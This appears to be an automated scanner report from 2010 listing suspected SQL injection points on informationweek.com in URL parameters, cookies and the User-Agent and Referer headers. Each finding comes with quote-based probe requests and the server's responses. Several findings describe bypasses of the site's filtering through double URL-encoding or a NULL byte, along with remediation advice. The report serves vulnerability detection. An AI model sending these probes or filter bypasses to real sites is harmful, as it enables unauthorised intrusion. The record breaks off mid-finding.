HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:32 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:32 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video%2527%2527/security/68553969001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/68553969001' HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30445
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security/68553969001'' HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/68553969001''&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /video/security/81784308001' HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:22:02 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:02 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30445
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <p class="StoryContentColor">The URL (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN#onlineprod"> ...[SNIP]...
Request 2
GET /video/security/81784308001'' HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:03 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:03 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001''&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_lv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_lv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_lv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68383
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529%2527%2527; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:20:49 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:49 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 68289
<!--<DROPLET SRC="combinexy.jhtml">--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xh ...[SNIP]... <span>Although a few Network Access Control players have begun to fail and exit the market, StillSecure is going strong. We caught up with Chief Strategist Alan Shimmel at Interop 2008 in Las Vegas.</span> ...[SNIP]...
Request 2
GET /video/security/81784308001 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:21:12 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:12 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/video/security/81784308001&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 70366
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror"> ...[SNIP]...
Request 2
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:23:29 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:29 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00'; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 70361
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror"> ...[SNIP]...
Request 2
GET /whitepaper/ HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D%00''; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:57 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:57 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/index.jhtml&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:33 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:33 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The ebNewBandWidth_.www.informationweek.com cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ebNewBandWidth_.www.informationweek.com cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ebNewBandWidth_.www.informationweek.com cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:16 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:16 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62134
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333%2527%2527; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:18 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:18 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_101201 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_101201 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731'; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:00 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:00 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62125
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... <a href="/whitepaper/Security/Cyber-Terror" class="business"> ...[SNIP]...
Request 2
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731''; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response 2
HTTP/1.1 302 Moved Temporarily Date: Sun, 12 Dec 2010 00:22:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460&gateway=true Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 97
<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The iwkbtn_emc_101111 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iwkbtn_emc_101111 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
